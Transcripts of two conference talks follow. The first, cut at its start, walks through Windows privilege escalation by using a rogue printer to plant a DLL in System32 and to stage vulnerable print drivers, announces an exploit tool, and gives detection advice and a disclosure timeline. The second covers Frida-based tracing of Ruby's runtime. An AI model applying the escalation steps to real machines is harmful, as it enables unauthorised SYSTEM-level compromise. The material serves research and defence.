add printer interface to connect to the Evil Printer, which triggers the CAB download and unpackaging. The CAB file contains a file path with a directory traversal that gets unpacked anywhere on the system the attacker would like, essentially allowing the attacker to plant a DLL or overwrite an executable to escalate to system. As Steven Sealy's tweet suggested, generation of a malicious CAB is actually quite easy. Here I generate a CAB file containing a file called UALAPI.DLL that, due to the path traversal, will get written to the system 32 directory. Of course, UALAPI.DLL is a known missing DLL that an attacker can plant in order to escalate to system on reboot. And of course, if you're interested in recreating the CAB yourself, here's the source of the DLL I generated. Anyone familiar with PanicRidge RecoExploit will know I basically stole the snippet from them, but either way, if you go to the link repository, you'll find a project file that will compile the DLL. Obviously, this is nothing special or exciting. I just want to point out that this DLL executes who am I and writes the output to Cresol.txt. We will refer back to this throughout the talk. The more complicated part of the EvilPrinter attack is setting up the EvilPrinter. As I've suggested, this method is lifted entirely from last year's DEFCON presentation. Now for whatever reason, Qt PDFwriter has implemented delivery of a CAB file to remote clients via package point and print. So we can rely on the Qt PDFwriter to do all of our heavy lifting. If you prepare a Windows box in your control with the steps in the slide, then you'll be ready to serve up malicious CAB files. The next step is the actual exploitation. As a standard low privilege user, using the AdPrinter UI connects to the EvilPrinter you just configured. When the attacker connects to the printer, the CAB file is downloaded and unpackaged, which means our malicious DLL gets dropped into System32. We also see this pop-up regarding installation of a driver, which requires administrator approval. However, at this point, our attack has already been successful. So we can just hit cancel. After rebooting the system, the UAL API.DLL we dropped in System32 is loaded into a system process and executed. As you see, the result.txt created by the DLL contains the result of who am I, which, when the DLL was executed, was System. A successful privilege escalation and a really great attack in my opinion. It's only complicated by the requirement of an EvilPrinter, but in most attack scenarios, that shouldn't be a deal breaker. Like I said, there wasn't a public exploit for this, at least that I was aware of, so I've published my own. It's wrapped up into a tool that we'll talk about later, so I won't explain the silly name or how to use the exploit. We'll get there later. Just know a public exploit exists now, it's in the repository I mentioned earlier. So last fall, after this had been patched, I was exploring this attack surface, and I was thinking about this installed driver prompt. I was interested if driver installation always required administrative rights, or if I could bypass that somehow. So I decided to spend some time learning how a standard, low privilege user can install a print driver on their system. But first we need to pick a driver that we would actually want to install. As an attacker, I'd love to install this vulnerable RICO driver that we talked about earlier. As a reminder, the vulnerability in this driver is a race condition to overriding a DLL during the add printer call. But if timed correctly, a standard user can escalate to system. Now one of the requirements to add printer is of course the driver name the new printer will be using. Which is all well and good when the driver is available, like in this screenshot. The add printer call would be successful on this target. But when the driver isn't present, add printer will obviously fail. So it should be fairly obvious why I'm interested in finding ways to install the driver without needing administrator privileges. If I can trick the system to loading the driver somehow, then I can install the driver as a standard low privilege user and exploit the driver's vulnerability. An attack that I'd like to call bring your own print driver vulnerability. So how can a standard user try to install the vulnerable print driver? There are actually a surprising amount of legitimate options. I listed a bunch here and we're going to quickly look at what happens when they're invoked by a standard user. First of all, thank you to Penegrid for leaving links to the RICO installer in their blog. That did prove very helpful to me. The RICO installer for the vulnerable driver isn't so much an installer, but just right clicking on an M file to invoke the MFIN installer, which just so happens to require administrative rights. So that's not really all that useful for the standard user. Pointing the printer user interface at the M file yields similar results. So that's another no go for the standard user. MFIN installer fails with a very ugly and sort of useless error message. However, looking up the command in MS documentation, we find this useful tidbit. The M file should exist in the driver's door. Well, what is that? Well, just hold on. We'll circle back to that. Invoking printui.dll yields the exact same result as just using the UI. Instead of what you'd expect, so yet another failure for the standard user. And yet again, another failure when trying to use puren driver.vbs. And while there are too many MS API functions for printers, printdemons specifically use install printer driver from package because a standard user could invoke it if, as highlighted here, the driver is in the driver's door. So it seems like getting the print driver into the driver's door would be really useful. How do we go about doing that? Well, let's talk about it. In this section, we'll finally see how to get the RECO driver onto the system as a standard user. A good place to start is, what is the driver's door? The answer is that it's a trusted location on the system where signed and verified driver packages are stored. Installing a driver to the driver's door is referred to as staging, likely so it isn't confused with installation. Staging a driver in the driver's door is not the same as installing it. Only administrators can stage drivers. Probably the best tool for enumerating, adding, and removing drivers is the plug and play util tool. In this screenshot, the administrator adds the vulnerable RECO driver to the driver's door. And once the vulnerable RECO driver is in the driver's door, a standard low privilege user can install it while adding a new printer. Now, obviously, this talk is about a standard low privilege user adding a driver to the driver's door and not an administrator, like in the previous slide. But I want to highlight how owning the driver's door is all we need to be able to then exploit the RECO driver. So finally coming full circle, we sought to discover if a low privilege user can introduce arbitrary drivers to the system. We tested multiple methods of installing the vulnerable RECO driver and we checked out how the driver's door works. Is there any way to stage a print driver as a standard low privileged user? And the answer, of course, is yes. A standard low privilege user can stage drivers into the driver's door by connecting to a printer that uses package point and print just like Evil Printer. The package or the cab file, if signed, will be stored, will be staged in the driver's door. So an attacker that controls an Evil Printer and a standard Windows account can stage drivers of their choosing. The client need only invoke the get printer driver MSAPI function. The printer responds with the driver and the system verifies the driver's integrity before finally dropping it into the driver's door. It's really just that easy. So let's try it ourselves. We need to create a cab file for our vulnerable RECO driver. As we talked about earlier, the RECO installer just sort of left us this exploded directory. Well, we can roll all that up into a cab file using make cab. Obviously, the cab file we generate isn't signed. But fortunately for us, Windows doesn't care about that. When unpackaging the cab, the system will hunt out the security catalog that I've highlighted. The security catalog itself is signed by Microsoft Windows Hardware Compatibility Publisher. And the catalog contains hashes of each file that the driver needs. Now if you have sharp eyes, you might ask, does it matter if the valid to date has expired? And the answer is no. The system doesn't care at all about that. So we've created a RECO cab that is cryptographically acceptable to the Windows printer subsystem. Now we just need to configure the evil printer just as we did earlier in the talk. I'll leave that as an exercise for home since it's the exact same setup we discussed before and I'll share a tool in a bit that automates all of that. Now once the evil printer is all set up, we can connect to it as a standard low privilege user via the ad printer UI. If successful, we should see a new entry in the driver's store. Here we've established our connection to the evil printer and I've highlighted our RECO driver staged in the driver's store. The only downside here is that we've triggered Windows update. Here we'll discuss how to avoid triggering the update and really the UI altogether. We can now see that our RECO driver is staged via the print UI. So a low privilege user can now use it to add a printer and most importantly, exploit it to achieve system. Now that's the whole thing, using a remote printer to stage drivers and exploiting the staged driver. Literally bring your own print driver vulnerability. Is this a vulnerability in Windows? Yes, I think so. As I just said, we clearly crossed the security boundary by adding a driver into the driver's store and the result of crossing that security boundary is that we're able to escalate to system. Is this actually a vulnerability in Windows? No, it's a feature that's working as designed. This is exactly how printers are supposed to work. The system is supposed to automatically download and stage the package so that the user can add a new printer. And as we all know, features aren't vulnerabilities. We can dislike the feature and believe it's flawed, but at the end of the day, a feature really just isn't a vulnerability. But really, is this a vulnerability in Windows? I'd say honestly, I'm not sure and I'm not sure I really care all that much. I think both arguments are true. At the end of the day, I can escalate to system. You can call the bug, you can call the feature. The result is the same either way. Escalation of system. Is this useful? Of course, this is useful as long as you can establish a remote connection to an evil printer in your control, you can escalate to system. What's more, is I'm not sure it's a patchable issue. It's working as designed and it works for Windows versions back to at least Windows 7. Maybe Vista, I actually didn't get a chance to try. What's more though, is it makes old or unlikely to be seen in the wild print drivers like Rigo really valuable, since now we can just pop them on the box at will and exploit them. So that's the entire concept. Standard user can add a print driver of their choosing and exploit it to obtain system privileges. But of course, no one wants to do that manually. So I've developed a tool that automates the process. The tool is called concealed position. So here's an early screenshot of the GitHub repo and a link. As of August 7th, this should be open to everyone. Now concealed position is developed in C++ and has three major components. The first is the server for configuring the evil printer. The second is the client for staging the driver and executing the privilege escalation. And finally, the DLL that gets executed with system privileges. Concealed position currently has four exploits you can choose from. Slashing damage and poison damage are the two we've already spoken about. It's CVE-20-20-1300 and poison damage is the Rigo driver. But it also has two more vulnerable drivers that I found. And while recording this, I'm still in the middle of disclosing to the vendors, which we will talk about at the end of this talk. The first one is asset damage, which is a vulnerability in Lexmark's universal print driver. And the second is radiant damage, which is a vulnerability in Canyon's TR-150 print driver. Concealed position can also be executed in a local only mode when the drivers already exist in the driver's store. Now here's a sample screenshot of the server. And as you can see, it's simple to invoke. You just select the exploit you want to use. And the client is similar, except you need to either specify local exploitation or provide the evil printer address and the name of the evil printer you're going to connect to. And here's the tool after executing an attack using asset damage. Again, we see the DLL used. Just echoes whom I to the result.txt file you see pictured here. And one of the previous slides, we saw that connecting to the evil printer using the add printer UI triggered Windows update, which is obviously a no go during a real attack. By using the WinAPI calls listed in the slide, the client is able to avoid Windows update and the UI altogether. In the first stage, which is the connection to the remote printer, the attacker utilizes get printer driver. In the second phase, the driver is installed from the driver store using install printer driver from package. This connection typically then occurs during the add printer call. Now there's a lot of love for PowerShell out there, and I think it's the obvious tool for a lot of people. So some might wonder why didn't develop concealed position in PowerShell. First of all, I just happen to love C++. It's really sort of the language that I think in first. But I think it's also good to know if you do want to use PowerShell, the add printer using connection name will stage the driver into the driver store, but it also triggers Windows update as well. But if you like PowerShell, that's probably easy enough to work around. If you want to develop your own tooling, you should definitely pursue that. All right, so we've talked about the attack and I've showed off my tools. So let's talk about the new driver vulnerabilities that I found. The first one is acid damage. And like I said earlier, it's an issue with Lexmark's universal print driver affecting versions 2.15.1.0 and below. This has been assigned CVE 2021 35449. The issue is that during add printer, a world writable file is parsed for DLLs. An attacker can just insert a path reversal to a DLL on their control, resulting in escalation to system, escalation to system. Very, very simple. Now obviously the exploit has an implementation in concealed position, but I've also developed a Metasploit module for this as well. Now, the module doesn't use an evil printer, it's just a local only attack. However, one of the challenges with recording this so far in the past, like I said, I'm recording this in mid July, it's July 13. So the challenge here is that I can't really show an open pull request until August 7. So I can't link it here, but trust me, when the morning of August 7 throws around, I will open that pull request. Now remember to use this attack with the evil printer, we need to generate a cap file. Now we can cheat and just download version 10 2.10.0.5 from the Windows update catalog. So that works fine, so why not? The cap file downloaded from Windows catalog is also signed by Microsoft, so that's kind of a neat thing we can't recreate just by using MakeCab. But if you want to use the latest version, we can do that too. First we just have to grab the Lexmark installer, and it will dump the required files off of C Lexmark. We can use the same technique as before, using DER to generate our files list. Except MakeCab doesn't respect directories unless you tell it to, so you have to modify all the files.txt file to let MakeCab know that the driver needs the director's structure to be respected. But that's really it. Pass the modified files.txt to MakeCab, and we have a cap file to use with concealed position. Again, our generated cap file isn't signed, but it contains a valid security catalog. The next vulnerable driver, RadiantDamage, is an issue I discovered in the driver for Canon's Pixma TR150 mobile wireless printer. The TR150 driver 3.71.2.10 and below is affected. And again, this is a local privilege escalation during the ad printer process. This issue has not been assigned to CVE at time of recording, so I guess we'll discuss that in a bit. Similar to the Ricoh vulnerability, this is a race condition to overwrite a DLL and program data. If you can time it correctly, the overwritten DLL will get picked up by print isolation hosts and executed a system. Again, very simple. I found that this is a bit difficult to time, a little bit harder than the NASA damages, but it usually takes no more than a couple of minutes to finally hit. Again, we need a cap file to work with concealed position server. And again, you can actually download the TR150 driver from the update catalog. So we can simply download it and we have assigned, well formed, most current version of a totally exploitable driver to use. Now, of course, it might be useful to know how to generate our own still. The Canon installer will download the following files into a directory in app data. Note the flat file structure. Because of the flat file structure, it's trivial to package up using make cab. We just do exactly what we did for the Ricoh cab. And just like that, we generated our own correctly formed TR150 cab. Again, you can find the implementation of radiant damage at the following link. And again, there is a metasploit module. I just couldn't include the link because I recorded so far in the past. So that's all for the exploitation sections. And I hope you find it interesting. But I now want to touch on detection and mitigation for those of us that have to defend against this sort of thing in the real world. Now my full time job is not defending. So these are best effort. Forgive me if I have overlooked anything obvious. So the first detection is from the event log. Event ID 600 is great for catching CBE 2020-1300 or what I call slashing damage or what is known as the aversional evil printer. This is the path traversal presented last year at DEF CON. And you can even see in the description that the failure is that mentions that the failure can occur due to a bad or missing signature, which is exactly what the original evil printer serves up. Event 215 catches all the other issues, at least as I've coded them up. Here you can see the exploitation caused the printer driver to fail to install correctly during the ad printer process. You can also investigate the setup API.DEF file and see windows slash int. Now this could be quite tedious as it's very verbose and quite long, but it's actually great documentation for any driver that has been introduced to the system or even a driver that has been attempted to be introduced to the system. And of course, you can detect the attack over the wire as long as SMB encryption isn't enabled. The challenge here, of course, is that this attack uses totally legitimate behavior, although depending on your environment and where the evil printer is located, this might be a good way to detect the attack. For instance, it's probably a bad thing if one of your systems is reaching out to a printer over the internet. I've also embedded a unique string into concealed positions client. I chose the client because that's typically the victim system. So if you're using YARA or any other signature based system, you should be able to identify use of CP client based on this string. Naturally smart attackers are going to review the code I've written and remove this line. But there are a lot of dumb attackers out there too. So hopefully if this ever does get used in the wild, this will help stop that. One of the challenges with mitigations is I doubt this will ever see any real patch. Installing a printer is meant to use these mechanisms. I think the best you can do is just ensure that the affected drivers aren't on your systems already and then enable the package point and print approved servers in GPO. Now of course, that will make it very difficult for your end users to add printers. That's sort of the entire issue, isn't it? Printers can't be trusted. And finally, I'd like to discuss the disclosures of the vulnerabilities and suggest some future work. So after getting my DEF CON acceptance and talking to Darkwolf, I sent similar disclosures to Lexmark, Canon, and Microsoft. All were provided descriptions and exploit code. All very similar disclosures really. And they were all informed of the August 7th disclosure date. Excuse me. Lexmark was awesome. And this is exactly how you want disclosure to go. They acknowledged receipt immediately. I sent the disclosure on a Friday because I'm a monster and they confirmed the issue on a Monday. And it only took a little more than a week to send me a beta patch, which is really impressive. You can see at the end here that Lexmark intends to release a patch shortly after I record this talk. So by the end of the week of July 12. And Lexmark has been a great communicator overall. Even when as far as wishing me good luck on my DEF CON talk, which I never actually told them about, so that was, I thought that was pretty clever. So shout out to Graydon if you're listening. Now the only real problem with this disclosure is it took MITRE two weeks to assign a CVE, which is really frustrating from a researcher's point of view. They can't move faster than that. They literally have two jobs, assigning and publishing CVE that other people write. So how hard is that? Otherwise, great disclosure. Lexmark is awesome. So Canon and Lexmark were sent a very similar content to the point that I accidentally left the word Lexmark in a spot in my Canon disclosure. And disclosure with Canon started off very well. They asked clarifying questions on the affected component, but then nothing. On July 9th, they had the vulnerability for three weeks and the HEN confirmed the issue. They haven't denied the issue. They didn't indicate if they tried the POC or if they'd even looked at the POC, even though I keep asking. Now they did release a security patch on July 4th, but after looking at it, it doesn't affect the vulnerability I reported. And they for some reason didn't mention it to me until eight days later. But basically, I'm not sure where the confusion lies with Canon. They aren't giving me any type of feedback so that I can help them. And I think at some point I'll probably have to loop in cert CC so that this gets CVE hopefully by August 7th. But the Microsoft disclosure has been reasonable. As you can see from the timeline, there was a fair amount of back and forth about recreating the issue. But eventually, I guess the proof of concept video got there, which probably just means my written instructions weren't very good. Now while they did acknowledge the issue on July 12th, I actually don't expect any type of CVE here or security bulletin. Actually I just wanted Microsoft to be aware that this is a thing they designed into their system and that I'm going to talk about it on August 7th. So mission accomplished. But I'm honestly, I'm not sure how they can address this without breaking normal printer workflows. I think it is very funny how these three different disclosures, they were all very similar content but they all had very different results. So one turned out good, one turned out bad, and one spent a lot of time and can't reproduce. So last slide, future work. Like I said, any print driver that is compatible with the driver store is fair game. New or old, really very old is even up for grabs here. So there are many drivers that could be analyzed and added to concealed position. There's also nothing special about QPDF. It's only there because I couldn't get SAMBO to what I wanted and didn't have the time to write my own implementation of delivering a package point and print cab file. Now hopefully in the future, I or someone else will code that up so that others can use an old printer as they choose. Once that is done, this attack would be great paired with a USB attack. And finally, concealed position could use polishing. Like most exploits, it was written only to prove that the attack was possible. So it's a little messy at the moment and some of the mechanisms around dropping DLL and customizing payloads could be extended. Otherwise, that's it. Thank you all so much for listening. Thank you very much to Darkbull for letting me share. And thank you again, Defcon for both the support and allowing me to present. Again, thank you all.
|
What can you do, as an attacker, when you find yourself as a low privileged Windows user with no path to SYSTEM? Install a vulnerable print driver! In this talk, you'll learn how to introduce vulnerable print drivers to a fully patched system. Then, using three examples, you'll learn how to use the vulnerable drivers to escalate to SYSTEM. REFERENCES: - Yarden Shafir and Alex Ionescu, PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more) - https://windows-internals.com/printdemon-cve-2020-1048/ - voidsec, CVE-2020-1337 – PrintDemon is dead, long live PrintDemon! - https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/ - Zhipeng Huo and Chuanda Ding, Evil Printer: How to Hack Windows Machines with Printing Protocol - https://media.defcon.org/DEF CON 28/DEF CON Safe Mode presentations/DEF CON Safe Mode - Zhipeng-Huo and Chuanda-Ding - Evil Printer How to Hack Windows Machines with Printing Protocol.pdf - Pentagrid AG, Local Privilege Escalation in many Ricoh Printer Drivers for Windows (CVE-2019-19363) - https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/ - space-r7, Add module for CVE-2019-19363 - https://github.com/rapid7/metasploit-framework/pull/12906 - Microsoft, Point and Print with Packages - https://docs.microsoft.com/en-us/windows-hardware/drivers/print/point-and-print-with-packages - Microsoft, Driver Store - https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store - Microsoft, Printer INF Files - https://docs.microsoft.com/en-us/windows-hardware/drivers/print/printer-inf-files - Microsoft, Use Group Policy settings to control printers in Active Directory - https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer
|
10.5446/54215 (DOI)
|
Hi and welcome to Instrument and Find Out, writing parasitic tracers for high-level languages. I'm Jeff, I'm a good Zillen CC group. I like to do hack-on stuff and do various things for the purpose of this talk. That means programs, languages, run times, memory, and bytes. But first up, I noticed by viewing this presentation, you agree to indemnify and hold harmless the presenter in the event you decide to take any of his advice and find yourself unable to sleep at 4 in the morning due to language demons. So just as an outline of the structure of this talk, I'm going to talk about kind of the background of what led me to this work, what parasitic tracers are, how to kind of design them for tracing high-level language run times, looking at Ruby as a sort of case study, and then some concluding thoughts. So first about me, I've done a fair amount of work with dynamic instrumentation and tracing, from Java bytecode, various stuff in Android, Linux, both user land and in the kernel, through BPF. Generally, I do a lot of this stuff mostly for reversing and learning stuff and also to kind of script up existing things to do other things. So for dynamic instrumentation, just as a quick refresher, this generally means function hooking or instruction instrumentation, the latter of which mostly means that you kind of modify bytecode or assembly to be different bytecode or assembly to do something different, whereas with function hooking, generally you are doing something that hijacks control flow directly to go somewhere else. Dynamic tracing can refer to dynamically enabling or disabling existing logging functionality, but for our purposes, this mostly means adding enhanced logging functionality that wasn't there before. I've also been recently doing tracing with Frida for Ruby, which is what this talk is about. So, some background on Ruby and myself. A little while back, I had to do some Ruby bytecode transformation stuff and convert more modern bytecode to an older one, older format, so translate newer opcodes into equivalent older ones so that a decompiler that only knew the older format would work. And that worked quite nicely for me at the time. More recently, a colleague and I were looking at Ruby's DRuby protocol. We were writing a scanner for it in Ruby, of all things. We gave a talk on this in NorthSec earlier this year. There were some weird issues that came up, and I spent a lot of time debugging this and going through the Ruby internal source code and see to find out that basically you don't want to call IO read on a socket object, instead you want to just call receive. This led me to start writing this parasitic low-level Ruby tracer. What are parasitic tracers? What are tracers? Tracer is an enhanced logger that basically dumps everything you might want about program state, running code, et cetera. And a parasite is a highly specialized, unwanted organism that symbolically lives off of, but inside of another organism that is completely adapted to. So a parasitic tracer is a combination of these two. It's basically a tracer that's specially adapted to the target process that it hooks onto and injects itself into and makes use of its internal functionality that wasn't really intended to be accessible. So the tracing of this part is just kind of a goal. I want to write a tracer for Ruby to better understand it. But the parasitic part is more of an implementation detail. Sorry you've done this if you've ever used LD preload to inject code into something. So why would you write these things? Well, to get a better understanding of where the higher level abstractions meet the lower level implementations in, say, runtimes and things. So for reversing or debugging or just plain performance analysis, you could also be writing one of these things mostly to avoid having to maintain a fork of the actual code base if you want to kind of maintain a tracer out of tree because you can just do it on the process itself and not have to recompile it against the whole code base. So some examples of these parasitic tracers would be Frida's Java bridge API, which is actually arguably two of them. One for Android and one for the JVM itself. They provide basically an API for hooking into higher level Java operations, but in ways that weren't really intended to be allowed by the platform. So in Android, it's totally hooking the runtime. And for the JVM, it's using some of the JVM instrumentation APIs, but it's definitely doing stuff that doesn't involve those in weird ways. And so whereas a normal vanilla Java agent that uses those things wouldn't really qualify as a parasitic tracer because it's using kind of public APIs specifically for this purpose, the way that Frida does it is a little bit more invasive. But let's just say that if you're crawling around the memory of a processor intercepting its calls, chances are you just have a tracer, but like S-trace. But if you are hooking around in functions inside of the process itself or really calling functions from inside the process, then you're doing some parasitic stuff. So let's talk about designing these things for high level language runtimes. So first some prereqs. You're going to need some means to actually hook the code or instrument it, generally ideally one that allows you to kind of remove those hooks or re-admit runtime. You could do this with the debugger and breakpoints, especially scripted debugger. You could do this with an instrumentation toolkit like Frida, which is what I generally do these days. You will also need a way to invoke existing functionality that's in that code, in that process. So generally speaking, you do that with the debugger or with Frida. The debugger would be something like the expression syntax for calling functions. But the thing is, is what you need to know what you're going to call. So the hierarchy of how you want to be preferring things is ideally public APIs that aren't going to change all that often, then internal APIs with symbols, then internal APIs that don't have symbols, but that you can get handles on fairly easily, say if the pointers to them are passed into other functions, you can just catch them there. Then after that, you're probably just going to want to opt for re-implementing stuff locally yourself. And then finally, all the way at the end, if you need to reuse existing code that's inside the process that you can't get to find a good way to find, you might need to just search for bytecode sequences and match on them. But moving on, the first step to owning a target is recon, and that is the first step to designing a parasitic tracer. You're going to need to be doing some reverse engineering, really to understand the internals of what it is you're going to be mucking around with. And as you do so, you'll learn more. But you may actually have source, like I was looking into Ruby, C Ruby. But you still need to know what's actually going on at the native level, especially with the way that your instrumentation itself works, because at that point, C doesn't really matter anymore. And optimizations can lead to functions or lead to weird situations where garbage values are sent to functions that don't process on them anyway, and you need to be careful when handling those inputs, stuff like that. And then additionally, just all of these kind of runtimes heavily rely on super implementation to find behavior. And so you need to be really careful about how you're interacting with their code from your code. After that, you're going to want to identify all of the things that you're going to want to hook on or call into to build up all of your whatever it is you're going to get out of the runtime or the language. And then next is actually doing all of the hooking and calling of those things. So you're going to hook all that functionality, you're going to extract all the relevance state that you can get. You're going to start invoking, you know, function calls that are in the thing to get other pieces of data out of it, et cetera. And then after that, you're going to kind of bring it all together and orchestrate all that in what I like to call puppeteering. To bring together all your hooks, have them coordinate with one another, possibly be managed by some sort of injected thread or whatnot. At this point, you're mostly building up from there to have better interrupt between your own hooks and better interrupt between the actual platform you are messing around with. So in this case, for me, it was Frida, which is JavaScript. So basically a JavaScript to Ruby bridge more or less. So ideally you start small and build big. You compose together a larger set of hooks from a smaller set of modular pieces. You are in a good position to do this because you're hooking on to a full program that already exists and runs on its own. So mostly you just need to make sure that you don't break it with what you're doing and injecting into it. But other than that, the thing will continue to run on its own just fine. So the next thing with about this layering stuff is that you can take advantage of, you know, layering on abstract calls that are implemented with version-specific behaviors. So for example, if you have a pointer to a struct but between two different versions of the binary, the field you want that's inside of that struct is a different offsets, you need to have some functionality to be able to handle that. But the pointer to the start of it is still the same. So you could do this with perversion implementations or version-based switches, kind of like if-defs or both. But let's talk about Ruby. So Ruby is a scripting language. That's right. The most interesting thing about Ruby is it's super object-oriented, and every time you try to access something on an object that's actually a method call and all the method calls are basically handled via sending messages. Ruby is super featureful, but it doesn't have really any good low-level introspection or tracing capabilities. It does have this thing called TracePoint, which is an API for various events that go on as Ruby executes. But it can't really intercept method arguments or native function parameters. It can't really provide information on bytecode execution, and it doesn't really provide all that useful information for any time you're switching back and forth between Ruby and native code. This is mostly an artifact of the fact that Ruby is a language and C Ruby is an implementation. So this bytecode stuff, all this lower-level stuff, are kind of implementation details. And this API needs to theoretically work across multiple different Ruby implementations. But really, the C Ruby implementation should have better tracing stuff given that it basically functions similarly to Java, and Java has a very well-defined and extensive API for instrumentation. So I wrote this thing called Ruby Trace, which is a Frida-based CLI tool for instrumenting Ruby and kind of dumping everything that goes on as it executes. So it hooks all the opcodes. The interesting thing about that is the implementation of the opcode handlers are kind of all a bunch of labeled go-to spots in a giant state machine. They're not really their own functions. They don't have your standard calling convention preludes. And then separately, Ruby has a bunch of C functions to call Ruby methods and do a whole bunch of stuff about handling the methods and tying them to objects, both native code to Ruby and Ruby back to native code calls. So I hook all that stuff, and I hook the transition between Ruby and native code, and then hook those native functions, and et cetera. And then separately, it supports kind of hooking into Ruby's internal exception handling mechanisms. What it pulls out of that is basically all the arguments of all kinds, even the special internal ones for the opcodes, and then it basically Ruby inspects everything, which is a stringification, kind of like wrapper in Python. One problem with that is many times values aren't fully initialized or the Ruby VM itself isn't fully initialized. You need to be very careful about how you try to call things on things that aren't fully initialized. So it handles a lot of that, trying to be very careful, but when it's safe to actually send the inspect method over and doing alternative fallback approaches when it can't. It dumps out the byte code whenever you see something like a method or a block being defined. It dumps all the return values for opcodes and the native functions it hooks, it gets all sorts of other metadata, and takes all sorts of things to make them human readable. It supports Ruby 2.6.3.0, and I assume once 3.1.1. comes out, it won't be too much effort to get it working on 3.1. I have a sort of generic implementation with a couple of version-specific behaviors and switches, and then for a separate lower level, anytime I need to deal with Ruby structs from C, I just have a version-specific set of structs to pull fields from, essentially, using a Frida C module API. So other cool things that it does is it actually makes use of the TracePoint API, but not in the way you'd expect. It's just that the TracePoint API has a very good way of controlling whether or not it's enabled based on various aspects. And so whenever tracing the TracePoint API is enabled, that turns it on, and whenever it's turned off, it turns it off. It gives you fine-grained control to very minutely trace certain pieces of execution. I have a bunch of test cases for various bytecode sequences that seem to cover a greater span of more detail of edge cases than Ruby's own internal opcode test suite, although not necessarily some of the other ones. I also implement support for dead Ruby opcodes that shouldn't even exist anymore for some reason. But basically, Ruby Trace is kind of like its own CRuby bytecode interpreter because of how it works. So as a demo, let's switch to this view. So I have some Ruby code here that defines a TracePoint tracer. And then in the middle, this big block is actually a stringified block of this Ruby code with this foo method and then some calls into it. And then it redefines symbol to redefine its triple equal operator, then calls a lot of those same things over again. And then it compiles that code from the string and then evaluates it under the tracing. So in this case, the tracer that's being used doesn't really do anything. So when you run this code, it just kind of spits things out. The more interesting thing is that the not found Watt on the left side gets replaced with a symbol on the right side because that triple equal when it hits the comparison for the symbol, it mincingly matches stuff. So the Watt string will, in the last case, hit the symbol check against a foo, symbol foo, and that will just pass. So now let's run this under Ruby Trace. And basically Ruby Trace dumps out a whole bunch of stuff. One of the first things you can see is that the instruction sequence part from that compilation you see there and then you see the call to the eval on it. And then we're inside of that. The first thing that happens is the foo method is defined. And so it dumps out all of the byte code of that foo method. We can see a bunch of values from it. Next it adds that to the class it's in. Then we see the first call into foo from the hello string. And then we run through that check operation. So the first thing that happens we see is a call into this opt case dispatch, which is a special case byte code generated for switches that don't have special types in them, only simple types. And basically it optimizes so that all of the cases get added into a single Ruby hash and then it just checks if the value is a member of the hash. But it first checks a bunch of things about the object coming in to make sure it's a simple type that the comparison would work in the first place. So in this case hello is the string, it's a simple string, it's in there, it takes the hello path, we move on. The next thing is we have one, it takes the one path and so forth. But then we eventually see this big decimal 3.0 value, which you'll see represented variously as 0.3e1. And that thing will get passed in to foo. And the problem is, is that because it is not a simple type, it will fall through. And the way that this works is that the optimization is just a quick check first, and it is kind of a guard on top of what the rest of the switch implementation would be, which is a series of subsequent if-else checks. That's just how Ruby does it. And so it falls through and then starts doing all of the if-else's. It doesn't match like a string, it doesn't match a whole bunch of stuff. And then eventually we see a bunch of operations where it's trying to compare against the float value and the big int has to do a bunch of math conversions to get the stuff out for the comparison. And so then it eventually does the comparison and sees that 0.3e1 is equal to 3.0 float. And so then it check match passes, that's the comparison for the branch, and then it jumps to the code that is part of its segment of the branch. We continue doing all of this for the rest of the values. We see in this case the string wat. It doesn't match anything, so it ends up in the else path. But it was a simple type, so it actually goes to the else path directly. And then we see the code that redefines symbols triple equal method. And from this point on, things are going to get a little bit weird. So we start seeing that all of these up case dispatches end up falling through because triple equal has been redefined. And so basically there's a short circuit in the implementation where Ruby says, well, if any of these core equals things has been redefined on any of the core types, such as symbol, it just can't bother to do any comparisons anymore one way or the other. And it's faster to just give up and have them go through all of the checks one at a time. And so we run through this all one after another, and then we get to the end with all the values and they get percolated up from all the functionality. So feature work, I have to implement support for Ractors, Ruby's new multi-VM in process concurrency model. Right now I'm just kind of relying on the one global Ruby VM internal of the process. And then just generally keeping up the Ruby versions. The code will be available here at our GitHub repo shortly after this presentation airs. But in conclusion, it's been really fun working on this, although it's been pretty tiring because of all the craziness that goes on with Ruby and various random things that can fail when you're messing around in its insights. But I think that all of these techniques pretty much apply to other high level languages and runtimes. Some good examples are Python, Node, Golang, and Haskell. And I really think people should be trying to build some of these things. So to paraphrase Arlo Guthrie. You know, if one person, just one person does it, they may think he's really sick. But three people do it. Three. Can you imagine three people writing parasitic tracers? They may think it's an organization. And can you imagine 50 people? I said 50 people writing these tracers, friends, they may think it's a movement. And that's what it is. I'd like to thank Addison, my partner in crime on the Ruby stuff that led us down this rabbit hole for me doing this work. And a wise man once said, you can't hide secrets from the future using math. I believe that is true, but I also believe it is true that you simply can't hide from the future. I would take questions, but this is a recording, so there are no questions to be had. So instead, I will answer a question about why on my intro page, I used an image from a Pokemon crystal and not Pokemon Ruby. Well to answer that question, I do not like Ruby learning. I do not like it's yuppie gang. I do not like it's symbol keys. I do not like it's optional parentheses. I do not like it's method send. I do not like it's begin and end. I do not like it's magic verbs. I do not like it's an athotic keywords. I do not like it's IO.read. I do not like it's lackluster speed. I do not like it's deal open jit. I do not like strong params permit. I do not like it's if unless. I do not like it's dependency mess. I do not like it's case in when. I do not like it's require middleman. I do not like it's polymorphism. I do not like it's object fanaticism. It's object nil gives me pain. That Ruby Lang is profane. Thank you.
|
Modern programming languages are, more and more, being designed not just around performance, ease-of-use, and (sometimes) security, but also performance monitoring and introspectability. But what about the languages that never adopted such concepts from their peers? Or worse, what about the languages that tacked on half-hearted implementations as an afterthought? The answer is simple, you write your own and instrument them into the language dynamically. In this talk, we will discuss the process for developing generalized parasitic tracers targeting specific programming languages and runtimes using Ruby as our case study. We will show how feasible it is to write external tracers targeting a language and its runtime, and discuss best practices for supporting different versions over time. REFERENCES: * https://github.com/ruby/ruby * https://frida.re/docs/javascript-api/
|
10.5446/54216 (DOI)
|
